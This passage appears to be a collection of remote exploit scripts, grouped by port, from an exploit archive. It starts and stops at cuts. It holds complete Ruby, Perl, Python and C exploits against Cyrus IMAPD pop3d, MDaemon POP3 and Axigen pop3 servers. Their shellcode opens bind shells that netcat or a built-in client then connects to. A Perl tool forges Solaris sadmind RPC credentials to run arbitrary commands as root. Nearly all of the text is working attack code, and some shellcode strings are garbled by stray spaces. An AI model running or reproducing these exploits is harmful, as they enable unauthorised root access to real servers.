"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1"+
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0"+
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53"+
"\x89\xe1\xcd\x80"
puts "--[cyrus imapd pop3 popsubfolders exploit"
puts "----[by bannedit"
puts "-----------------------------------------"
case ARGV.length
when 0
puts "--- ./exploit [host] [options]"
exit
when 1
sock = TCPSocket.new(ARGV[0], "pop3")
when 2
sock = TCPSocket.new(ARGV[0], "pop3")
ret = ARGV[1].hex
end
ret = (targets['linux 2.6'].hex)
puts "<- " + banner = sock.gets
puts "-> sending USER command"
printf " injecting shellcode: %d bytes\n", shellcode.length
#this alignment stuff should probably be cleaned up its kinda icky#
evil_buff = "USER "
evil_buff <<"\x90" * 265 #(290 - shellcode.length)
evil_buff << ([ret].pack('V')) * 2 #return address
evil_buff <<"\x90" * (250 - shellcode.length)
evil_buff << shellcode
evil_buff <<"\x90" * (29)
ret = ret - 277
evil_buff << ([ret].pack('V')) * 4 #0x080fd204
evil_buff <<"\r\n"
sock.send(evil_buff, 0)
sleep 9
puts " attempting to connect to #{ARGV[0]} port 4444"
cmd = "nc #{ARGV[0]} 4444"
system(cmd)
sock.close
# [2006-07-21]
110 Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
#!/usr/bin/perl
## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
##
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
## exploits and not either of them worked (not that they don't but coding my own is generaly faster
## and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy
## unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting...
## realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
## when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before
## the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have
## done here is used the same method, yet found a data area that is not going to freak pop3d
## out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled
## 'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving.
##
## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that
## is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something
## that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
## shellcode (because it'll segfault and won't get executed).
##
## Note: bindport is 13370
################################################## ################################################## #############
use IO::Socket;
use strict;
my $host = $ARGV[0] || help();
my $offset = $ARGV[1] || help();
my $port = 110;
# stollen from cyruspop3d.c because this actualy worked, i couldn't get any
# metasploit sc to work (as usualy, hmph)
my $shellcode =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\x e1\xcd\x80\x96".
"\x43\x52\x66\x68\x34\x3a\x66\x53\x89\xe1\x6a\x66\x 58\x50\x51\x56".
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x 56\x43\x89\xe1".
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x 49\x79\xf9\xb0".
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x52\x53".
"\x89\xe1\xcd\x80";
my $sock = IO::Socket::INET->new('PeerAddr' => $host,
'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!\n");
$sock->autoflush();
print $sock "USER "; ## begin USER command with just that
print $sock "$shellcode"; ## shellcode is *userbuf is *user
print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out
print $sock "\n"; ## that simple
sub help {
print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n";
print "08/12/2006\n\n";
print "perl $0 \$host \$offset\n\n";
print "Offsets: \n";
print "0x8106c20 (debian 3.1 - 2.6.16-rc6)\n";
exit(0);
}
# [2006-08-14]
110 MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit
#!/usr/bin/python
import sys
import struct
import socket
from time import sleep
################################################## ######################################
# MDaemon Pre Authentication (USER) Heap Overflow
# Code based on Leon Juranic's exploit
# Coded by muts - [email protected]
# http://www.hackingdefined.com
# http://www.remote-exploit.org
# Tested on:
# Mdaemon 9.0.5
# Mdaemon 7.2.3
# Mdaemon 7.2.2
# Mdaemon 7.2.1
# Mdaemon 7.2.0
# Possibly Others
# PLEASE CONTINUE READING !
# Huge greets to xbxice and talz for leading me away from the darkness
################################################## ######################################
# Mdaemon is wierd. It seems like their developers decided to annoy everyone
# by making their software do unexpected things.
# The exploit overwrites UnhandledExceptionFilter, and jumps to an egghunter
# shellcode - which then scans the memory, and executes a bindshell on port 4444.
#
# On some Win2k SP4 machines, I found SetUnhandledExceptionFilter at 0x00000214,
# for which I unfortunately had no explenation.
# I later found out that these machines were fully patched ...
# After inspecting kernel32.dll from my SP4 (not fully patched) and comparing it to
# todays' version, I noticed that the SetunhandledExceptionFilter function had changed,
# and looks suspiciously similar to XP SP2...
# Note that my unpatched win2k was last patched 2-3 weeks ago,
# so I suspect this change is recent.
# The end of easy UnhandledExceptionFilter exploitation on Win2k ?
#
# So, this is a partially working exploit, on unpatched win2k boxes....
# Kiddies, treat this exploit as DOS :)
#
# I got 3 types of results with this code:
#
# 1. Shell :)
# 2. Mdaemon process shoots up to 100%, scanning memory for shellcode that isn't there.
# 3. Plain ugly crash - oh well.
#
# At minimum, I'de check the UnhandledExceptionFilter address before running the exploit.
################################################## ######################################
#
# C:\Documents and Settings\muts>nc -v 192.168.220.128 4444
# 97DACBEC7CA4483 [192.168.220.128] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\MDaemon\APP>
################################################## ######################################
host="192.168.220.128"
ret = struct.pack("<L",0x7c2f62b6) # 7c2f62b6 advapi.dll JMP ESI+48 SP4 No Patches
ueh = struct.pack("<L",0x7C54144C) # SetUnhandledExceptionFilter 0x7C54144C win2k SP4 No Patches
tap = struct.pack("<L",0xeb169090) # Short Jump over some garbage
# skape's egghunter shellcode
egghunter ="\xeb\x21\x59\xb8\x74\x30\x30\x77\x51\x6a\xff\x33\x db\x64\x89\x23"
egghunter +="\x6a\x02\x59\x8b\xfb\xf3\xaf\x75\x07\xff\xe7\x66\x 81\xcb\xff\x0f"
egghunter +="\x43\xeb\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x 04\x0c\xb1\xb8"
egghunter +="\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
shellcode ="\x90\x90\x74\x30\x30\x77\x74\x30\x30\x77" # t00wt00w (!)
shellcode +="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
shellcode +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
shellcode +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
shellcode +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
shellcode +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x56\x4b\x4e"
shellcode +="\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x36\x4b\x38"
shellcode +="\x4e\x46\x46\x52\x46\x42\x4b\x48\x45\x34\x4e\x53\x 4b\x48\x4e\x57"
shellcode +="\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x 4a\x41\x4b\x48"
shellcode +="\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x48"
shellcode +="\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x 46\x38\x42\x4c"
shellcode +="\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e"
shellcode +="\x46\x4f\x4b\x53\x46\x45\x46\x32\x4a\x52\x45\x37\x 45\x4e\x4b\x38"
shellcode +="\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x 4e\x30\x4b\x54"
shellcode +="\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x42\x4b\x38"
shellcode +="\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x 41\x53\x4b\x4d"
shellcode +="\x46\x56\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x54\x 4e\x30\x4b\x38"
shellcode +="\x42\x57\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x 50\x45\x4a\x46"
shellcode +="\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x 48\x4d\x48\x56"
shellcode +="\x43\x35\x48\x46\x4a\x56\x43\x43\x44\x43\x4a\x36\x 47\x47\x43\x57"
shellcode +="\x44\x33\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e"
shellcode +="\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x 49\x38\x45\x4e"
shellcode +="\x48\x36\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x 4c\x36\x44\x50"
shellcode +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x55"
shellcode +="\x4f\x4f\x48\x4d\x43\x45\x43\x55\x43\x45\x43\x35\x 43\x55\x43\x34"
shellcode +="\x43\x45\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x36\x 4a\x56\x41\x51"
shellcode +="\x4e\x35\x48\x46\x43\x35\x49\x38\x41\x4e\x45\x39\x 4a\x46\x46\x4a"
shellcode +="\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x 4c\x36\x42\x51"
shellcode +="\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x42"
shellcode +="\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x 4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x45\x4e\x49\x44\x48\x48\x49\x34\x47\x55\x 4f\x4f\x48\x4d"
shellcode +="\x42\x35\x46\x35\x46\x35\x45\x45\x4f\x4f\x42\x4d\x 43\x49\x4a\x56"
shellcode +="\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x 48\x4d\x45\x45"
shellcode +="\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x56\x 4a\x46\x43\x46"
shellcode +="\x4d\x46\x49\x38\x45\x4e\x4c\x46\x42\x55\x49\x55\x 49\x32\x4e\x4c"
shellcode +="\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x58\x44\x4e\x 41\x33\x42\x4c"
shellcode +="\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x 44\x34\x4e\x42"
shellcode +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x56"
shellcode +="\x44\x37\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x 46\x44\x4f\x4f"
shellcode +="\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x 41\x55\x4c\x56"
shellcode +="\x41\x50\x41\x45\x41\x35\x45\x45\x41\x55\x4f\x4f\x 42\x4d\x4a\x56"
shellcode +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x 48\x4d\x4c\x46"
shellcode +="\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x58\x 47\x55\x4e\x4f"
shellcode +="\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x 4f\x4f\x42\x4d"
shellcode +="\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x35\x43\x55\x 4f\x4f\x48\x4d"
shellcode +="\x4f\x4f\x42\x4d\x5a"
buffer ="AAA"+tap+"BBBB"+ret+ueh+"\x90"*90 +egghunter+"C"*346
for x in range(5):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER '+'@A' * 1600 + '\x90'*5945 + shellcode +'D'*3711 + '\r\n')
s.send('QUIT\r\n')
s.close()
sleep(1)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,110))
data=s.recv(1024)
print data
s.send('USER ' + '@A@A'+ buffer + '\r\n')
data=s.recv(1024)
print data
s.send('USER ' + 'A' * 3370 + '\r\n')
s.close()
sleep(1)
# [2006-08-26]
110 Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit
/* axiagen.c
*
* Axigen eMail Server v2.0 (beta)
* by fuGich Tue Dec 5 2006
*
* thanks to mu-b
*
* - Tested on: Axigen V2 (beta)
*
* logType for the pop3 service must be "system" and
* the logLevel set to any number with 4th bit set
*
* remote shell format string vulnerability in pop3
* /bin/sh to bind to port 31337
*
* optimised format string generated with libforSC
* used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#define DEF_PORT 110
#define PORT_POP3 DEF_PORT
char formatString[] =
// plt fixup code
"\xba\xd8\xbe\x85\x09" // mov $0x985bed8,%edx
"\xc7\x02\x9a\xf0\x04\x08" // movl $0x804f09a,(%edx)
"\x8d\x52\x04" // lea 0x4(%edx),%edx
"\xc6\x02\xaa" // movb $0xaa,(%edx)
"\x90\x90\x90" // make divisible by 8
//
// bind shell with fork to port 31337 98 bytes
//
"\x6a\x66" // push $0x66
"\x58" // pop %eax
"\x99" // cltd
"\x6a\x01" // push $0x1
"\x5b" // pop %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x6a\x02" // push $0x2
//
// <_doint>:
//
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80
"\x5b" // pop %ebx
"\x5d" // pop %ebp
"\x52" // push %edx
"\x66\xbd\x69\x7a" // mov $0x7a69,%bp (0x7a69 = 31337)
"\x0f\xcd" // bswap %ebp
"\x09\xdd" // or %ebx,%ebp
"\x55" // push %ebp
"\x6a\x10" // push $0x10
"\x51" // push %ecx
"\x50" // push %eax
"\x89\xe1" // mov %esp,%ecx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\xb3\x04" // mov $0x4,%bl
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
//
// <_acceptloop>:
//
"\x5f" // pop %edi
"\x50" // push %eax
"\x50" // push %eax
"\x57" // push %edi
"\x89\xe1" // mov %esp,%ecx
"\x43" // inc %ebx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80
"\x93" // xchg %eax,%ebx
"\xb0\x02" // mov $0x2,%al
"\xcd\x80" // int $0x80
"\x85\xc0" // test %eax,%eax
"\x75\x1a" // jne <_parent>
"\x59" // pop %ecx
//
// <_dup2loop>:
//
"\xb0\x3f" // mov $0x3f,%al
"\xcd\x80" // int $0x80
"\x49" // dec %ecx
"\x79\xf9" // jns <_dup2loop>
"\xb0\x0b" // mov $0xb,%al
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x52" // push %edx
"\x53" // push %ebx
"\xeb\xb2" // jmp <_doint>
//
// <_parent>:
//
"\x6a\x06" // push $0x6
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\xb3\x04" // mov $0x4,%bl
"\xeb\xc9" // jmp <_acceptloop>
//
// 9 write addresses
//
"\xd8\xbe\x85\x09" // pointer @ 0x0985bed8
"\xd9\xbe\x85\x09"
"\xda\xbe\x85\x09"
"\xdb\xbe\x85\x09"
"\xe0\xbe\x85\x09" // place shell code @ 0x0985bee0
"\xe1\xbe\x85\x09"
"\xe2\xbe\x85\x09"
"\xe3\xbe\x85\x09"
"\xe4\xbe\x85\x09"
// add the format string
"%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$ hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhn\r \n";
static int sock_send (int sock, u_char * src, int len);
static void formatme (u_char * host);
static int sockami (u_char * host, int port);
void shell (int sock);
void shell (int sock){ /* Attach to Remote Shell */
int l;
char buf[512];
fd_set rfds;
while (1) {
FD_SET (0, &rfds);
FD_SET (sock, &rfds);
select (sock + 1, &rfds, NULL, NULL, NULL);
if (FD_ISSET (0, &rfds)) {
l = read (0, buf, sizeof (buf));
if (l <= 0) {
printf("\n - Connection closed by local user\n");
exit (EXIT_FAILURE);
}
write (sock, buf, l);
}
if (FD_ISSET (sock, &rfds)) {
l = read (sock, buf, sizeof (buf));
if (l == 0) {
printf ("\n - Connection closed by remote host.\n");
exit (EXIT_FAILURE);
} else if (l < 0) {
printf ("\n - Read failure\n");
exit (EXIT_FAILURE);
}
write (1, buf, l);
}
}
}
static int sock_send (int sock, u_char * src, int len){ /* send data to the open socket */
int sbytes;
sbytes = send (sock, src, len, 0);
return (sbytes);
}
static int sockami (u_char * host, int port){ /* create the socket */
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL){
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){
perror ("connect()");
exit (EXIT_FAILURE);
}
return (sock);
}
static void formatme (u_char * host){ /* do the evil */
int sock;
printf ("+Connecting to %s:%d ", host, PORT_POP3);
sock = sockami (host, PORT_POP3);
printf ("\n+Sending format string\n");
sock_send (sock, formatString, strlen (formatString));
fflush (stdout);
sleep(2);
printf ("+Connecting to Shell ");
sock = sockami (host, 31337);
printf ("- Done\n");
shell(sock);
}
int main (int argc, char **argv){ /* go figure */
printf ("Axigen 2.0 beta Remote pop3 exploit\n"
"by: <[email protected]>\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n\n", argv[0]);
exit (EXIT_SUCCESS);
}
formatme (argv[1]);
}
// [2007-02-18]
انتهينا من بورت 110
نبداء بـ بورت 111
111 Solaris Sadmind Default Configuration Remote Root Exploit
#!/usr/bin/perl -w
##################
##
# Title: rootdown.pl
# Purpose: Solaris Remote command executiong via sadmind
# Author: H D Moore hdm at metasploit.com
# Copyright: Copyright (C) 2003 METASPLOIT.COM
##
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
use Getopt::Std;
my $VERSION = "1.0";
my %opts;
getopts("h:p:c:r:iv", \%opts);
if ($opts{v}) { show_info() }
if (! $opts{h}) { usage() }
my $target_host = $opts{h};
my $target_name = "exploit";
my $command = $opts{c} ? $opts{c} : "touch /tmp/OWNED_BY_SADMIND_\$\$";
my $portmap = $opts{r} ? $opts{r} : 111;
##
# Determine the port used by sadmind
##
my $target_port = $opts{p} ? $opts{p} : rpc_getport($target_host, $portmap, 100232, 10);
if (! $target_port)
{
print STDERR "Error: could not determine port used by sadmind\n";
exit(0);
}
##
# Determine the hostname of the target
##
my $s = rpc_socket($target_host, $target_port);
my $x = rpc_sadmin_exec($target_name, "id");
print $s $x;
my $r = rpc_read($s);
close ($s);
if ($r && $r =~ m/Security exception on host (.*)\. USER/)
{
$target_name = $1;
} else {
print STDERR "Error: could not obtain target hostname.\n";
exit(0);
}
##
# Execute commands :)
##
my $interactive = 0;
if ($opts{i}) { $interactive++ }
do {
if ($opts{i}) { $command = command_prompt() } else
{
print STDERR "Executing command on '$target_name' via port $target_port\n";
}
$s = rpc_socket($target_host, $target_port);
$x = rpc_sadmin_exec($target_name, $command);
print $s $x;
$r = rpc_read($s);
close ($s);
if ($r)
{
# Command Failed
if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x29")
{
print STDERR "Error: something went wrong with the RPC format.\n";
exit(0);
}
# Command might have failed
if (length($r) == 36 && substr($r, 24, 4) eq "\x00\x00\x00\x2b")
{
print STDERR "Error: something may have gone wrong with the sadmind format\n";
}
# Confirmed success
if (length($r) == 36 && substr($r, 24, 12) eq ("\x00" x 12))
{
print STDERR "Success: your command has been executed successfully.\n";
}
if (length($r) != 36) { print STDERR "Unknown Response: $r\n" }
} else {
print STDERR "Error: no response recieved, you may want to try again.\n";
exit(0);
}
} while ($interactive);
exit(0);
sub usage {
print STDERR "\n";
print STDERR "+-----==[ rootdown.pl => Solaris SADMIND Remote Command Execution\n\n";
print STDERR " Usage: $0 -h <target> -c <command> [options]\n";
print STDERR " Options:\n";
print STDERR " -i\tStart interactive mode (for multiple commands)\n";
print STDERR " -p\tAvoid the portmapper and use this sadmind port\n";
print STDERR " -r\tQuery alternate portmapper on this UDP port\n";
print STDERR " -v\tDisplay information about this exploit\n";
print STDERR "\n\n";
exit(0);
}
sub show_info {
print "\n\n";
print " Name: rootdown.pl\n";
print " Author: H D Moore <hdm\@metasploit.com>\n";
print "Version: $VERSION\n\n";
# not finsihed :)
print
"This exploit targets a weakness in the default security settings
of the sadmind RPC application. This application is installed and
enabled by default on most versions of the Solaris operating
system.\n\n".
"The sadmind application defaults to a weak security mode known as
AUTH_SYS (or AUTH_UNIX under Linux/BSD). When running in this mode,
the service will accept a structure containing the user and group
IDs as well as the originating system name. These values are not
validated in any form and are completely controlled by the client.
If the standard sadmin RPC API calls are used to generate the request,
the ADM_CLIENT_HOST parameter is filled in with the hostname of the
client system. If the RPC packet is modified so that this field is
set to the hostname of the remote system, it will be processed as
if it was a local request. If the user ID is set to zero or the
value of any user in the sysadmin group, it is possible to call
arbitrary methods in any class available to sadmind.\n\n".
"If the Solstice AdminSuite client software has not been installed,
the only class available is 'system', which only contains a single
method called 'admpipe'. The strings within this program seem to
suggest that it can be used run arbitrary commands, however I chose
a different method of command execution. Since each method is simply
an executable in the class directory, it is possible to use a
standard directory traversal attack to execute any application.
We can pass arguments to these methods using the standard API.
An example of spawning a shell which executes the 'id' command:
# apm -c system -m ../../../../../bin/sh -a arg1=-c arg2=id\n\n".
"To exploit this vulnerability, we must create a RPC packet that
calls the '/bin/sh' method, passing it the parameter of the command
we want to execute. To do this, packet dumps of the 'apm' tool
were obtained and the format was slowly mapped. The hostname of
the target system must be known for this exploit to work, however
when sadmind is called with the wrong name, it replies with a
'ACCESS DENIED' error message containing the correct name. The
final code does the following:
1) Queries the portmapper to determine the sadmind port
2) Sends an invalid request to sadmind to obtain the hostname
3) Uses the hostname to forge the RPC packet and execute commands
This vulnerability was reported by Mark Zielinski and disclosed by iDefense.
Related URLs:
- http://www.idefense.com/advisory/09.16.03.txt
- http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view
";
exit(0);
}
sub command_prompt {
select(STDOUT); $|++;
print STDOUT "\nsadmind> ";
my $command = <STDIN>;
chomp($command);
if (! $command || lc($command) eq "quit" || lc($command) eq "exit")
{
print "\nExiting interactive mode...\n";
exit(0);
}
return ($command)
}
sub rpc_socket {
my ($target_host, $target_port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => "udp",
Type => SOCK_DGRAM
);
if (! $s)
{
print "\nError: could not create socket to target: $!\n";
exit(0);
}
select($s); $|++;
select(STDOUT); $|++;
nonblock($s);
return($s);
}
sub rpc_read {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}
sub nonblock {
my ($fd) = @_;
my $flags = fcntl($fd, F_GETFL,0);
fcntl($fd, F_SETFL, $flags|O_NONBLOCK);
}
sub rpc_getport {
my ($target_host, $target_port, $prog, $vers) = @_;
my $s = rpc_socket($target_host, $target_port);
my $portmap_req =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x86\xa0". # Program Number (PORTMAP)
"\x00\x00\x00\x02". # Program Version (2)
"\x00\x00\x00\x03". # Procedure (getport)
("\x00" x 16). # Credentials and Verifier
pack("N", $prog) .
pack("N", $vers).
pack("N", 0x11). # Protocol: UDP
pack("N", 0x00); # Port: 0
print $s $portmap_req;
my $r = rpc_read($s);
close ($s);
if (length($r) == 28)
{
my $prog_port = unpack("N",substr($r, 24, 4));
return($prog_port);
}
return undef;
}
sub rpc_sadmin_exec {
my ($hostname, $command) = @_;
my $packed_host = $hostname . ("\x00" x (59 - length($hostname)));
my $rpc =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x87\x88". # Program Number (SADMIND)
"\x00\x00\x00\x0a". # Program Version (10)
"\x00\x00\x00\x01". # Procedure
"\x00\x00\x00\x01"; # Credentials (UNIX)
# Auth Length is filled in
# pad it up to multiples of 4
my $rpc_hostname = $hostname;
while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "\x00" }
my $rpc_auth =
# Time Stamp
pack("N", time() + 20001) .
# Machine Name
pack("N", length($hostname)) . $rpc_hostname .
"\x00\x00\x00\x00". # UID = 0
"\x00\x00\x00\x00". # GID = 0
"\x00\x00\x00\x00"; # No Extra Groups
$rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("\x00" x 8);
my $header =
# Another Time Stamp
reverse(pack("L", time() + 20005)) .
"\x00\x07\x45\xdf".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04".
"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND
"\x00\x00\x00\x0a\x00\x00\x00\x04".
"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND
"\x00\x00\x00\x0a\x00\x00\x00\x11\x00\x00\x00\x1e".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".
"\x00\x00\x00\x3b". $packed_host.
"\x00\x00\x00\x00\x06" . "system".
"\x00\x00\x00\x00\x00\x15". "../../../../../bin/sh". "\x00\x00\x00";
# Append Body Length ^-- Here
my $body =
"\x00\x00\x00\x0e". "ADM_FW_VERSION".
"\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00".
"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x08". "ADM_LANG".
"\x00\x00\x00\x09\x00\x00\x00\x02\x00\x00".
"\x00\x01". "C" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0d". "ADM_REQUESTID".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x12\x00\x 00\x00\x11".
"0810:1010101010:1"."\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x09". "ADM_CLASS".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x07".
"\x00\x00\x00\x06" . "system" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0e" . "ADM_CLASS_VERS" .
"\x00\x00\x00\x00\x00\x09\x00\x00\x00\x04".
"\x00\x00\x00\x03". "2.1".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0a" . "ADM_METHOD" .
"\x00\x00\x00\x00\x00\x09\x00\x00\x00\x16".
"\x00\x00\x00\x15". "../../../../../bin/sh" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x08". "ADM_HOST" .
"\x00\x00\x00\x09\x00\x00\x00\x3c\x00\x00\x00\x3b".
$packed_host.
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0f". "ADM_CLIENT_HOST".
"\x00\x00\x00\x00\x09".
pack("N", length($hostname) + 1) .
pack("N", length($hostname)) .
$rpc_hostname .
"\x00\x00\x00\x00". "\x00\x00\x00\x00".
"\x00\x00\x00\x11" . "ADM_CLIENT_DOMAIN".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x 00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x11" . "ADM_TIMEOUT_PARMS".
"\x00\x00\x00\x00\x00".
"\x00\x09\x00\x00\x00\x1c".
"\x00\x00\x00\x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x09" . "ADM_FENCE" .
